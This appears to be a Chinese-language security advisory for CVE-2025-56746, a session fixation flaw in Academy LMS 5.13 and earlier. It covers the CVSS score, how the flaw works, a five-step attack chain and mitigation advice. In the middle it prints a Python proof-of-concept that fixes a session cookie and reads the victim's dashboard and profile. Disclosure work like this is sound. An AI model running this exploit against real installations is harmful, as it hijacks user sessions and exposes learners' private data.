CVE-2025-56746：Creativeitem Academy LMS会话固定漏洞

漏洞信息

漏洞编号

CVE-2025-56746

漏洞类型

会话固定（Session Fixation）

CVSS评分

2.2 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Creativeitem Academy LMS

漏洞概述

CVE-2025-56746是Creativeitem Academy LMS学习管理系统中存在的一个会话固定（Session Fixation）漏洞。该漏洞影响Academy LMS 5.13及以下所有版本。Academy LMS是由Creativeitem开发的一款广泛使用的在线学习管理系统，为教育机构和企业提供课程管理、在线考试、学习进度跟踪等功能。由于该系统在用户成功认证后不会重新生成会话ID（Session ID），攻击者可以利用这一缺陷预先确定或获取受害者的会话标识符，进而在受害者完成登录认证后劫持其会话，以受害者身份访问系统，执行未授权操作。

该漏洞的CVSS 3.1评分为2.2分，属于低危级别。攻击者需要具备本地访问能力（AV:L），攻击复杂度较高（AC:H），需要低权限认证（PR:L）并且需要用户交互（UI:R）。漏洞主要影响系统的机密性，对完整性和可用性没有直接影响。尽管严重等级较低，但会话固定漏洞可能导致敏感学习数据、用户个人信息及课程内容的未授权访问，对教育机构和用户隐私构成潜在威胁。该漏洞已于2025年10月15日公开披露，由安全研究员发现并报告。

技术细节

会话固定（Session Fixation）是一种Web应用安全漏洞，其核心原理是攻击者在受害者登录之前预先设置或获取一个已知的会话标识符，然后诱使受害者使用该会话标识符进行认证。由于应用系统在用户成功认证后没有调用session_regenerate_id()等函数重新生成新的会话ID，攻击者预先掌握的会话标识符在认证后仍然有效，从而实现会话劫持。

在Academy LMS 5.13及以下版本中，认证流程存在以下缺陷：
1. 用户访问登录页面时，系统分配一个会话ID并存储在Cookie中；
2. 攻击者通过XSS、社会工程学或直接网络访问等方式获取或设置受害者的会话ID；
3. 受害者在该会话上下文中输入凭证并完成登录认证；
4. 系统验证凭证成功后将用户权限关联到当前会话，但未执行会话ID重新生成操作；
5. 攻击者使用预先获取的会话ID即可访问已认证的用户会话。

利用条件包括：攻击者需要某种方式预先获取或设置受害者的会话标识符（如通过中间人攻击、共享计算机、或利用其他漏洞如XSS注入会话Cookie）。利用成功后，攻击者可以完全冒充受害者身份，访问其课程数据、个人信息、成绩记录等敏感内容。

攻击链分析

STEP 1

步骤1：获取会话标识符

攻击者访问Academy LMS登录页面，系统为其分配一个会话ID（Session ID），该ID通常存储在Cookie中。攻击者通过抓包工具或浏览器开发者工具获取该会话标识符。

STEP 2

步骤2：会话标识符植入

攻击者通过社会工程学、XSS攻击、共享计算机访问或网络中间人攻击等方式，将预先获取的会话ID植入到受害者的浏览器会话中，使受害者使用该固定的会话标识符。

STEP 3

步骤3：诱导受害者认证

受害者使用被固定的会话ID正常登录系统，输入有效的用户名和密码完成认证。由于系统未在认证后重新生成会话ID，攻击者预先掌握的会话ID在认证后仍然保持有效。

STEP 4

步骤4：会话劫持

攻击者使用预先获取的会话ID访问系统，系统将该会话识别为已认证状态，攻击者从而以受害者身份访问系统，获取课程数据、个人信息、成绩记录等敏感内容。

STEP 5

步骤5：未授权操作

攻击者利用劫持的会话执行各种未授权操作，如查看私密课程内容、修改用户设置、访问支付信息或执行其他特权操作，对受害者的数据安全和隐私构成威胁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-56746 - Academy LMS Session Fixation PoC
# Description: Demonstrates session fixation by pre-setting session ID before victim authentication

import requests

TARGET_URL = "http://target-academy-lms.com"
VICTIM_USERNAME = "victim_user"
VICTIM_PASSWORD = "victim_password"

# Step 1: Attacker visits the login page and obtains a session ID
attacker_session = requests.Session()
login_page = attacker_session.get(f"{TARGET_URL}/login")
attacker_session_id = attacker_session.cookies.get("PHPSESSID")  # or session cookie name used by Academy LMS
print(f"[+] Attacker obtained session ID: {attacker_session_id}")

# Step 2: Attacker tricks victim into using the pre-determined session ID
# This can be done via XSS, shared computer, network injection, etc.
# For demonstration: directly set the session cookie in victim's browser context

# Step 3: Victim authenticates using the fixed session ID
victim_session = requests.Session()
victim_session.cookies.set("PHPSESSID", attacker_session_id)

login_data = {
    "email": VICTIM_USERNAME,
    "password": VICTIM_PASSWORD
}
login_response = victim_session.post(f"{TARGET_URL}/login", data=login_data)
print(f"[+] Victim login response status: {login_response.status_code}")

# Step 4: Attacker uses the same session ID to access victim's authenticated session
# Since the application does NOT regenerate the session ID after login,
# the attacker's session ID remains valid and authenticated
attacker_authenticated = attacker_session.get(f"{TARGET_URL}/dashboard")
if "Welcome" in attacker_authenticated.text or "Dashboard" in attacker_authenticated.text:
    print("[!] Session Fixation successful! Attacker is now authenticated as victim.")
else:
    print("[-] Session fixation attempt failed.")

# Step 5: Attacker accesses victim's sensitive data
profile = attacker_session.get(f"{TARGET_URL}/user/profile")
print(f"[+] Victim's profile data accessed: {profile.text[:200]}")

影响范围

Creativeitem Academy LMS <= 5.13

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器层面配置会话超时策略，缩短会话有效期；2）监控异常会话活动，检测同一会话ID在不同IP地址的访问行为；3）实施额外的身份验证机制，如敏感操作前要求重新输入密码；4）将会话Cookie设置为HttpOnly和Secure属性；5）教育用户避免在公共计算机或不安全网络上登录系统，并在使用后完全注销；6）在应用层面添加会话ID重新生成的中间件或过滤器作为临时修复方案。